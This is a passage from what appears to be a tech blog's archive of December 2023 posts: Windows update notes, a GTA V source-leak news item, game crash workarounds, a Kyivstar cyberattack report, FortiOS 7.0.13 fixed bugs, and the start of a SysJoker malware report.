combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. Prerequisite: You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10 Classification: Security Updates If you want to remove the LCU To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages. Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation. File information For a list of the files that are provided in this update, download the file information for cumulative update 5034127. For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084.

Grand Theft Auto V Source Code Leaked: Security Breach Shakes Gaming Community In a surprising turn of events, the source code for one of the most iconic and enduring games in recent history, Grand Theft Auto V (GTA V), has reportedly been leaked online, causing a stir within the gamin g community and raising concerns about potential security ramifications. Image Source : BleepingComputer The leak, first identified by several gaming forums and news outlets, allegedly includes the game's source code files, which encompass critical elements of the game's development, including software architecture, design, and programming intricacies. Reports suggest that this breach has brought to light extensive details of the game's inner workings, potentially exposing sensitive information about Rockstar Games' proprietary technology and development practices. The unauthorized disclosure of such a significant portion of GTA V's source code has sparked discussions and debates among gaming enthusiasts, industry experts, and cybersecurity professionals. While the exact origins and methods behind the leak remain unclear, the implications of such a breach are far-reaching. One of the immediate concerns pertains to the potential exploitation of this leaked information. Access to the source code could enable malicious actors to identify vulnerabilities within the game's codebase, potentially leading to the creation of cheats, mods, or even security loopholes that could compromise the gaming experience for legitimate players. Moreover, this incident has raised questions about the broader security measures employed by gaming companies to safeguard their intellectual property. Rockstar Games, the developer behind GTA V, has not officially commented on the leak or provided details regarding the extent of the breach. The leak of source code material is not an isolated event within the gaming industry. Over the years, several high-profile games and gaming-related companies have experienced similar breaches, highlighting the ongoing challenges faced in protecting digital assets from unauthorized access and dissemination. As the gaming community awaits further developments and responses from Rockstar Games, discussions about the potential impact on GTA V's gameplay, security updates, and the broader implications for the gaming industry are gaining traction across social media platforms and online forums. While the fallout from the GTA V source code leak continues to unfold, the incident serves as a stark reminder of the evolving landscape of cybersecurity threats faced by the gaming industry and the critical need for robust protective measures to safeguard valuable digital assets. https://www.bbc.co.uk/news/technology-67663128

If you have recently updated your MWIII and kept receiving "DirectX encountered an unrecoverable error" then maybe some changes in the Settings could help get rid of the crash after a match From patch note : https://www.callofduty.com/patchnotes/2023/12/call-of-duty-modern-warfare-iii-season-1-patch-notes.html Workaround Fix Disabling the Ray Tracing , Disabling Ray Reconstruction , should eliminate the crashes , till Activision decides to fix it.

According to a report by Reuters that Kyivstar mobile operator was hit by a cyberattack , resulting in most of the network to be taken down , as quoted by Reuters And a report by Netblocks website shows the attack impact on multiple cities : Source : https://www.reuters.com/technology/cybersecurity/ukraines-biggest-mobile-operator-suffers-massive-hacker-attack-statement-2023-12-12/ Accessing the Kyivstar website would give this message (machine translated from Ukrainian) :

Ready or Not launches out of Early Access into 1.0 on December 13. Buy now: https://store.steampowered.com/app/11... Los Sueños – The LSPD reports a massive upsurge in violent crime across the greater Los Sueños area. Special Weapons and Tactics (SWAT) teams have been dispatched to respond to various high-risk scenes involving hostage situations, active bomb threats, barricaded suspects, and other criminal activities. Citizens are being advised to practice caution when traveling the city or to stay at home. Update: TOC to Entry Team, Launch will be in exactly T minus 24 hours. That means tomorrow December 13th, 10:00am PST (UTC-8). Synchronize your watches and get ready.

December 12, 2023—KB5033373 (OS Build 14393.6529) Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date: 12/12/2023 Version: OS Build 14393.6529 11/19/20 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1607, see its update history page. Highlights This update addresses security issues for your Windows operating system. Improvements This security update includes quality improvements. When you install this KB: This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new Security Update Guide website and the December 2023 Security Updates. Known issues in this update Microsoft is not currently aware of any issues with this update. How to get this update Before installing this update Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10 Classification: Security Updates File information For a list of the files that are provided in this update, download the file information for cumulative update 5033373.

December 12, 2023—KB5033371 (OS Build 17763.5206) Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Less Release Date: 12/12/2023 Version: OS Build 17763.5206 11/17/20 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. Highlights This update addresses security issues for your Windows operating system. Improvements This security update includes improvements. When you install this KB: This update changes the English name of the former Republic of Turkey. The new, official name is the Republic of Türkiye. This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files. This update affects Microsoft Defender for Endpoint (MDE). It enables Conditional Access (CA) scenarios. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new Security Update Guide website and the December 2023 Security Updates. Windows 10 servicing stack update - 17763.5084 This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. Known issues in this update Symptom Workaround Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also pe affected. Important This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues. To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured. We are working on a resolution and will provide an update in an upcoming release. How to get this update Before installing this update Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. Prerequisite: You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10 Classification: Security Updates If you want to remove the LCU To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages. Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation. File information For a list of the files that are provided in this update, download the file information for cumulative update 5033371. For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084.

December 12, 2023—KB5033118 (OS Build 20348.2159) Windows Server 2022 Release Date: 12/12/2023 Version: OS Build 20348.2159 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page. Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard. Improvements This security update includes quality improvements. When you install this KB: This update affects the Netherlands time zone. It adds the recent man-made landmass outside of Rotterdam to the shape files. This update affects Microsoft Defender for Endpoint (MDE). It enables Conditional Access (CA) scenarios. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the Security Update Guide and the December 2023 Security Updates. Windows Server 2022 servicing stack update - 20348.2084 This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. Known issues in this update Microsoft is not currently aware of any issues with this update. How to get this update Before installing this update Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Microsoft Server operating system-21H2 Classification: Security Updates If you want to remove the LCU To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages. Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation. File Information For a list of the files that are provided in this update, download the file information for cumulative update 5033118. For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2084.

If you have been waiting for Cities Skylines 2 and then got disappointed of how poorly it runs , it's completely understandable , I was able to avoid the low FPS start of the game , but wasn't able to continue that much because loading my saved city would keep making the game crash!. According to Colossal Order developers post , we have to tweak some settings in order to get some better FPS from the game since the game is very un-optimized and need lot of fixing still or needs saving by the community modders. First recommendation from developers were to tune down the resolution to 1080p , I kept it as 1440p and went with other recommendations as below: Depth of Field - Disabled Volumetrics Quality - Disabled Depth of Field - Disabled Motion Blur - Disabled Dynamic Resolution Scale Quality - Disabled Even after tweaking those settings you will still experience stuttering and sudden decrease in FPS and even crashes , developer patches are still needed because the game isn't in the best condition it could have been.

Grand Theft Auto VI is an upcoming action-adventure game in development by Rockstar Games. It is due to be the eighth main Grand Theft Auto game, following Grand Theft Auto V Grand Theft Auto VI heads to the state of Leonida, home to the neon-soaked streets of Vice City and beyond in the biggest, most immersive evolution of the Grand Theft Auto series yet. Coming 2025 to PlayStation 5 and Xbox Series X|S. https://www.rockstargames.com/VI

Resolved issues The following issues have been fixed in version 7.0.13. To inquire about a particular bug, please contact Customer Service & Support. Anti Spam Bug ID Description 877613 Mark as Reject can be still chosen as an Action in an Anti-Spam Block/Allow List in the GUI. Anti Virus Bug ID Description 911332 When UTM status is enabled and the AV profile has no configuration, all SLL traffic is dropped and there is no WAD output. 923883 The FortiGate may display an error log in the crash log due to AV delta update. In case of failure, a full successful AV update is done. Application Control Bug ID Description 939565 can not query meta rules list seen on graceful/non-graceful upgrade. DNS Filter Bug ID Description 931998 DNS filter flow external domain AAAA query can still check the default category but not the remote category. Endpoint Control Bug ID Description 897048 FortiOS should support EMS 7.2.1 auth API status code changes. 913324 GUI repeated calls to the EMS API, which can cause EMS to not authorize the FortiGate correctly. Explicit Proxy Bug ID Description 817582 When there are many users authenticated by an explicit proxy policy, the Firewall Users widget can take a long time to load. This issue does not impact explicit proxy functionality. 859693 Sessions between the explicit proxy and server stay in SYN_SENT state when using IP pools in the explicit proxy policy for source NAT, even though the sessions have established. Traffic is not impacted. 863665 Denied explicit proxy keeps using the Fortinet_CA_SSL default certificate, even if the configured certificate is different. 889300 Wrong source IP address used for packets through explicit proxy routed to a member of SD-WAN interface. 923302 Cannot send picture through web explicit proxy. Firewall Bug ID Description 719311 On the Policy & Objects > Firewall Policy page in 6.4.0 onwards, the IPv4 and IPv6 policy tables are combined but the custom section name (global label) is not automatically checked for duplicates. If there is a duplicate custom section name, the policy list may show empty for that section. This is a display issue only and does not impact policy traffic. 752267 Load Balance Monitor detects a server in standby mode as being down. 848058 NPD failed to parse zone in the source interface of a DoS/ACL policy and failed to offload. 851212 After traffic flow changes to FGSP peer from owner, iprope information for synchronized sessions does not update on the peer side. 861981 Traffic drops between two back-to-back EMAC VLAN interfaces. 879225 Egress interface cannot be intermittently matched for Wake-on-LAN (broadcast) packets. 879705 Traffic issues occur with virtual servers after upgrading. 884908 Implicit deny policy is allowing "icmp/0/0" traffic. 895946 Access to some websites fails after upgrading to FortiOS 7.2.3 when the firewall policy is in flow-based inspection mode. 897849 Firewall Policy list may show empty sequence grouping sections if multiple policies are sharing the same global-label. 912089 Optimize CPU usage caused by a rare error condition which leads to no data being sent to the collector. 914939 UDP fragments dropped due to DF being set. Only the set honor-df global option. 926029 New sessions are created and evaluated after a certain number of UDP packets, even if set block-session-timer 300 is set. 951373 Traffic shaping is not matching the correct queue for outbound traffic. FortiView Bug ID Description 894957 On FortiView Websites, the real time view is always empty if disk logging is disabled. GUI Bug ID Description 863126 In an environment where the Security Fabric is enabled and there are more than 100 firewall object conflicts between the root and downstream FortiGates, the Firewall Object Synchronization pane does not list the details. 892207 Unable to authorize a newly discovered FortiAP from the WiFi Controller > Managed FortiAPs page. 893560 When private data encryption is enabled, the GUI may become unresponsive and HA may fail to synchronize the configuration. 907041 Network > SD-WAN > SD-WAN Zones and SD-WAN Rules pages do not load if a shortcut tunnel is triggered. 916236 GUI policy table cannot display sequence grouping section titles correctly if they are duplicated in the global label. 919390 Disabling gui-wireless-controller on the root VDOM impacts other VDOMs (unable to add or show WiFi widgets on first load). 943949 When editing an interface description in GUI, the following characters are not allowed: <, >, (, ), #, ', and ". 946878 FortiGate HA management interface in the GUI not allowing multiple route entries, but the CLI does allow them. HA Bug ID Description 703614 HA secondary synchronization fails and keeps rebooting when the primary has a split port configuration. 771316 Platforms in an HA environment get stuck in a reboot loop while attempting to synchronize configurations that differ in split ports. 805663 After upgrading, rebooting the primary in HA (A-A) results in unusually high bandwidth utilization on redundant interfaces. 818432 When private data encryption is enabled, all passwords present in the configuration fail to load and may cause HA failures. 838571 After an HA split-brain event, the PPPoE interfaces are not recovered. 870312 On a FortiGate HA cluster, both primary and secondary units are displayed as the Primary on the GUI top banner, and as Current HA mode in the CLI. 875984 FortiGate is going to out-of-sync after changing parameters of VDOM link interfaces. 881337 Adding a VLAN interface on any VDOM causes BGP flapping and VIP connectivity issues on VDOMs in vcluster2. 893041 Cannot access out-of-band IPv6 address on HA secondary unit. 897865 When NP7 platforms enable the GTP enhanced mode it does not use uninterruptible upgrade. 902945 Lost management connectivity to the standby node via in-band management. 904318 FortiGate sent ARP request with loopback IP address as the source address. 912665 FGCP primary-secondary cluster only uses one session-sync-dev, in spite of having multiple session-sync-dev. 916216 When adding a new interface, some other interfaces have the wrong virtual MAC address. 920233 The System > HA page is missing from the GUI on 5K models. 931724 HA events not synchronizing between members, leading to unexpected HA status. 950868 Traffic is not forwarded on L2 peer to keep FGSP with an available L2 connection. 953167 Access to console and SSH is lost due to a specific configuration. Hyperscale Bug ID Description 915796 With an enabled hyperscale license, in some cases with exception traffic (like ICMP error traverse), the FortiGate may experience unexpected disruptions when handling the exception traffic. 924196 Device is rebooting randomly when driver processes exception packets. ICAP Bug ID Description 884339 When the algo process starts up, it attempts to build an ICAP profile without allocating memory beforehand. Intrusion Prevention Bug ID Description 823583 Failover on clustered web application using keepalived daemon does not work seamlessly. 842523 IPv6 with hardware offloading and IPS drops traffic (msg="anti-replay check fails, drop). 860315 Unexpected behavior in IPS engine when executing diagnose test application ipsmonitor 44. 862830 [?Q?ci_" sekret=] causes the parser to create a new field, "sekret=". 873975 Source MAC changes and the packet drops due to both sides of the session using the same source MAC address. 882593 HTTPS traffic slows when IPS with NTurbo is used over a virtual wire pair. 892302 Constant reloading of the external domain table is causing high CPU due to lock contention when reloading the table. 926639 Constant reloading of the shared memory external domain table is causing high CPU usage due to lock contention when reloading the table. 952270 IPS logs for VIP traffic shows external IP as a destination for some signatures. IPsec VPN Bug ID Description 766750 FortiGate does not accept secondary tunnel IP address in the same subnet as the primary tunnel. 812229 ASCII-encoded byte code of remote gateway IP is displayed in the GUI and CLI when a VPN tunnel is formed using IKEv1 or v2 if the peer-id is not configured. 872769 Proxy ARP stops working for a client connected to a dialup IPsec when the previous VPN was established and is deleted. 885333 Forwarded broadcast traffic on ADVPN shortcut tunnel interface dropped. 887800 In an L2TP configuration, set enforce-ipsec enable is not working as expected after upgrading. 920725 IPsec tunnels that have external DHCP services for IP assignment have an extra selector added after upgrading to 7.0.11. 922064 Firewall becoming unresponsive to DPD/IKE messages, causing IPsec VPNs to drop. 926048 Traffic through a shortcut got dropped after an HA failover. 928774 IPsec VPN connection should allow % in FortiClient Connect REG_PASSWD field. 932112 EAP in IKEv2 dialup IPsec connection does not work with two firewall polices, each using both the IKEv2 interface and user group. 949086 Policy route is not matching ESP traffic. 954614 IPsec phase 2 negotiation fails with failed to create dialup instance, error 22 error message. Log & Report Bug ID Description 831441 The forward traffic log show exabytes of data being sent and received from external to external IP addresses in multiple VDOMs. 860822 When viewing logs on the Log & Report > System Events page, filtering by domain\username does not display matching entries. 879228 FortiAnalyzer override settings are not taking effect when ha-direct is enabled. 893199 The FortiGate does not generate deallocate/allocate logs of the first IP pool when the first IP pool has been exhausted. 902797 IPS alert email not being sent when IPS attack event has triggered. 908856 Traffic log can show exabytes of data sent and received when generating log task is triggered from userspace. 932537 If Security Rating is enabled to run on schedule (every 4 hours), the FortiGate can unintentionally send local-out traffic to fortianalyzer.forticloud.com during the Security Rating run. Proxy Bug ID Description 783549, 902613, 921247 An error condition occurs in WAD caused by multiple outstanding requests sent from client to server with UTM enabled. 785927 Unexpected behavior in WAD when multiple DHCP servers are configured. 820096 CPU usage issue in proxyd caused by the absence of TCP teardown. 863132 Proxy mode inspection is slow when testing a single TCP stream from fast.com, which causes bandwidth slowness on FG-100F and FG-200F devices. 882182 Unexpected behavior in WAD due to the activation of firewall protocol options, with both client and server comfort features enabled. 897347 Memory usage issue caused by the WAD user info process while authenticating the LDAP users. 912116 Website (li***.cz) is not working in proxy inspection mode with deep inspection and web filter applied. REST API Bug ID Description 892237 Updating the HA monitor interface using the REST API PUT request fails and returns a -37 error. 903908 The forticron application crashes when restoring a VDOM configuration. 948356 An error condition occurs in HTTPSD when a REST API request is sent with invalid parameters. Routing Bug ID Description 775752 link-down-failover does not bring the BGP peering down. 779330 The SD-WAN service with load-balance mode is disabled, even though there is still a member alive in the service rule. 827565 Using set load-balance-mode weight-based in SD-WAN implicit rule does not take effect occasionally. 839669 Static route through an IPsec interface is not removed after the BFD neighbor goes down. 858248 OSPF summary address for route redistribution from static route via IPsec VPN always persists. 875668 SD-WAN SLA log information has incorrect inbound and outbound bandwidth values. 900941 config redistribute routing subsections cannot be configured when in workspace mode. 906896 Make OSPFv3 update the translator role and translated Type-5 LSA when the ASBR table is updated. 922491 Static routes are installed on hub FortiGate with add-route disabled in ADVPN scenario. 924940 When there are a lot of policies (several thousands), the interface member selection for the SD-WAN Zone dialog may take up to a minute to load. 928152 FortiGate generates two OSPF stub entries for the same prefix after upgrading from 6.4 to 7.0. Security Fabric Bug ID Description 851656 Sessions with csf_syncd_log flag in a Security Fabric are not logged. 912592 Allow comments and IP addresses to be on the same line for external IP address threat feeds. 912917 Send Fabric API calls with pagination filter. 917024 Unexpected behavior in Security Fabric daemon (CSFD) caused by triggering HA failover while using Security Fabric. 920391 Non-management VDOM is not allowed to set a source-ip for config system external-resource. 922896 Azure SDN connector always uses HA management port for DNS resolve. This might not work on premises where the HA management port does not have a public IP address assigned. SSL VPN Bug ID Description 631809 Configuring thousands of mac-addr-check-rule in portal makes the CPU spike significantly if several hundreds of users are connecting to the FortiGate, thus causing SSL VPN packet drops. 843756 Customer bookmark (*.tr***.pt) is not accessible when using SSL VPN web mode. 859088 FortiGate adds extra parenthesis and causes clicking all links to fail in SSL VPN web mode. 871229 SSL VPN web mode does not load when connecting to customer's internal site. 873516 FortiGate misses the closing parenthesis when running the function to rewrite the URL. 875167 Webpage opened in SSL VPN web portal is not displayed correctly. 881220 Found bad login for SSL VPN web-based access when enabling URL obscuration. 881268 Disconnecting from SSL VPN using the SSL-VPN widget does not disconnect the SSL VPN tunnel. 884869 Web mode bookmark showing blank page due to JS rewrite. 885978 Some buttons in URL are not working in SSL VPN web mode. 886989 SSL VPN process reaches 99% CPU usage when HTTP back-end server resets the connection in the middle of a post request. 887345 When a user needs to enter credentials through a pop-up window, the key events for modification key detected by SDL were ignored. 887674 FortiGate will intermittently stop accepting new SSL VPN connections across all VDOMs. 897385 Internal website keeps asking for credential with SSL VPN web mode. 897665 The external DHCP server is not receiving hostnames in SSL VPN and DHCP relay. 904919 DHCP option 12 hostname needed for SSL VPN with external DHCP servers. 927475 SSL VPN tunnel down log message not generated when an IP address is disassociated before the old tunnel times out. 933985 FortiGate as SSL VPN client does not work on NP6 and NP6XLite devices. 950157 SS LVPN connected/disconnected endpoint event log can be in the wrong sequence. 952860 During a handshake when FortiClient sends a larger-than-MTU hello message, the packet is fragmented by IP layer and dropped by the FortiGate. Switch Controller Bug ID Description 890912 FortiLink VLAN interface should be renamed from default to _default after upgrading to 7.0.10. 893405 One discovery one transmit buffer was allocated and was not released on connection terminations. 894735 Unable to configure more than one NAC policy using the same EMS tag for different FortiSwitch groups. 911232 Security rating shows an incorrect warning for unregistered FortiSwitches on the WiFi & Switch Controller > Managed FortiSwitches. 920231 FortiGate loses QoS ip-dscp-map configuration after reboot. 936081 The vlan-optimization {enable | disable} and vlan-all-mode all configuration options disappear after upgrade or reboot. System Bug ID Description 708964 CPU usage issue is observed caused by reloading the system when the system has cfg-save set to revert. 713951 Not all ports are coming up after an LAG bounce on 8 × 10 GB LAG with ASR9K. Affected platforms: FG-3960E and FG-3980E. 724085 Traffic passing through an EMAC VLAN interface when the parent interface is in another VDOM is blocked if NP7 offloading is enabled. 729912 DNS proxy does not transfer the DNS query for IPv6 neighbor discovery (ND) when client devices are using random MAC addresses, so one device can configure many IPv6 addresses. 822297 Polling fgfwpolid returns disabled policies. 828129 A disabled EMAC VLAN interface is replying to a ping. 832154 The cmdbsvr process may crash when there are many addresses and address groups that include each other recursively. 842159 FortiGate 200F interfaces stop passing traffic after some time. 855573 False alarm of the PSU2 occurs with only one installed. 859393 SNMP poll for fgExplicitProxyRequests returns 0. 862519 FortiGate 40F-3G4G WWAN connection unstable on Verizon Carrier. 866437 CPU usage issue caused by the new Linux kernel. 867663 The FEC configuration under the interface is not respected when port23 and port24 are members of an LACP and the connection is 100G. Affected platforms: FGT-340xE, FGT-360xE. 869044 If the original packet was forwarded with NAT, generated ICMP error is routed back to SNAT'ed address. 873805 CPSS usage goes to 99% and causes initiation issues when traffic is flowing upon boot. Affected platforms: FG-40xF, FG-60xF, FG-300xF. 874292 ssh-rsa should be disabled under the SSH server_host_key_algorithm. 876853 No output of execute sensor list is displayed after rebooting. 879769 If the firewall session is in check-new mode, FortiOS will not flush its NPU offload entry when there is a MAC address update of its gateway. 882187 FortiGate enters conserve mode in a few hours after enabling UTM on the policies. 884023 When a user is logged in as a VDOM administrator with restricted access and tries to upload a certificate (System > Certificates), the Create button on the Create Certificate pane is greyed out. 885823 Sensor showing temperature of 0.00 Celsius. 891165 Auto-script causes FortiGate to repeat commands. 892274 Daylight saving time is not applied for Cairo time zone. 892478 Interface release from cmdb and iprope keep updating when DHCP client renewal fails. 894202 Incorrect temperature calculation appears in sensor list on FG-8xF, FWF-8xF, FG-9xE, FG-10xE, FG-20xE, and FG-14xE. 894884 FSTR session ticket zero causes a memory leak. 903362 SNMP OID, fgFwPolLastUsed (1.3.6.1.4.1.12356.101.5.1.2.1.1.4), does not show the correct information about the last time a specific policy was used. 903397 After upgrading to 7.0.11, FortiOS cannot display QSFP+ transceiver information. Affected platforms: FG-110xE, FG-220xE, FG-330xE, FG-340xE, and FG-360xE. 904414 Port speed 1000auto could not link up with a Cisco switch. 904486 The FortiGate may display a false alarm message and subsequently initiate a reboot. 907339 dnsproxy process aborts due to stack buffer overflow being detected upon function return. 910269 Unexpected behavior caused by the Linux Out of Memory (OOM) killer when memory is very low. 910273 Last reboot reason: power cycle after rebooting due to a kernel panic is misleading. 910616 When a non-zero DSCP copied from ingress to egress packet for NAT64, the IP checksum is calculated incorrectly. 910651 All members are up on an FG-600F, but the LACP status is showing as down after upgrading. 910677 Transparent mode FortiGate does not reply to SYN ACK when communicating with FortiManager. 920085 CPU usage issue observed in dnsproxyd caused by unused wildcard FQDN. 922965 CPU usage issue observed in hasync daemon when session count is large. 922982 FortiGate does not respond to ARP requests for the IP address on the WAN port when the interface is configured as EMAC. 923364 System goes into halt state with Error: Package validation failed... message in cases where there are no engine files in the FortiGate when the BIOS security level is set to 2. 924395 IPv6 local-in ping6 to management interface failed when newly configured. 925657 After a manual system administrator password change, the updated password-expire is not received by the FortiManager auto-update. 926035 On D-series FortiGates, a false alarm during system integrity check failure causes the firewall to reboot. 926817 Review the temperature sensor for the SoC4 system. 929821 An error condition occurred in httpsd and newcli when trying to generate a TAC report from the GUI and CLI, respectively. 939411 Multiple spawns of Hotplug process consuming high CPU resources. 940571 Memory usage issue caused by excessive log files. 942502 Kernel panic occurs when creating EMAC VLAN interfaces based on an aggregate interface with new kernel 4.1.9. 945871 DNAT does not work on software switch in explicit mode. Upgrade Bug ID Description 920223 System hangs after upgrade with the following error at bootup: cli 141 die in an exception in line 4495: Hrp. 939011 All transparent VDOMs cannot synchronize because of switch-controller.auto-config.policy. User & Authentication Bug ID Description 790884 The FortiGate will not send a MAC-based authentication RADIUS authentication request for one of the devices on the network. 794477 When a user's membership in AD or port range is changed, all of the user sessions are cleared. 850473 SSL VPN and firewall authentication SAML does not work when the application requires SHA-256. 858877 Dynamic address only has 100 IP addresses while FSSO group lists all 56K ACI endpoints. 868994 FortiGate receives FSSO user in the format of HOSTNAME$. 883006 Adding a new group membership to an FSSO user terminates all the user's open sessions. 899852 FortiGate is sending Class(25) AVP with wrong length in RADIUS accounting when using 2FA with PUSH or external tokens. 901743 An error condition occurs during the processing of the UDP packets when device identification is activated on an interface. 943087 Guest management users no longer view the password automatically generated by the firewall. VM Bug ID Description 901920 AWS external account list supports regional endpoints. 913696 In the periodic status check of the OCI VM status, too many API calls caused a lot of 429 errors. 921168 Restore operation overwrite passive configuration in AZURE A-P deployment based on SDN connector. 927323 Event log alert Write Permission Violation to read-only file on VMware after taking snapshot. 932085 In an Azure cluster, the NTP source-ip6 (IPv6) is synchronized while the source-ip (IPv4) is not. 950899 Azure FortiGate keeps rebooting after upgrading to 7.0.11, and the device enters kernel panic. VoIP Bug ID Description 887384 SIP session is dropped by ALG with media type doesn't match message. Web Filter Bug ID Description 829704 Web filter is not logging all URLs properly. 878442 FortiGuard block page image (logo) is missing when the Fortinet-Other ISDB is used. 916140 An error condition occurs in WAD caused by the mismatch between the SNI host and CNAME. 941045 Local rating chooses the wrong category if the URL path falsely matches to a longer local rating URL. WiFi Controller Bug ID Description 875382 When accessing the managed FortiAP/Switch view with a large number of devices in the topology, the page takes a long time to load. 904349 Unable to create FortiAP profile in the GUI for dual-5G mode FortiAP U231F/U431F models. Workaround: use the CLI to update the profile to dual-5G mode. 905406 In auth-logon and auth-logout logs, Wi-Fi users with random public IP addresses are observed. 926999 EAP proxy daemon crashed with signal 11 and keeps reloading after receiving an empty username. ZTNA Bug ID Description 888814 Unable to match first group attribute from SAML assertion for ZTNA rule. 889994 After client device information is updated, the session is closed even though all information from the session still matches the policy. 923804 ZTNA logs are showing the log message Denied: failed to match a proxy-policy when client device information matches the policy. Common Vulnerabilities and Exposures Visit https://fortiguard.com/psirt for more information. Bug ID CVE references 875854 FortiOS 7.0.13 is no longer vulnerable to the following CVE Reference: CVE-2023-28001 911617 FortiOS 7.0.13 is no longer vulnerable to the following CVE Reference: CVE-2023-37935

Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker November 23, 2023 Key Findings Check Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel. Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs. Analysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016-2017 that were loosely linked to the threat actor known as Gaza Cybergang. Introduction Amid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor. SysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, SysJoker Windows variants have evolved 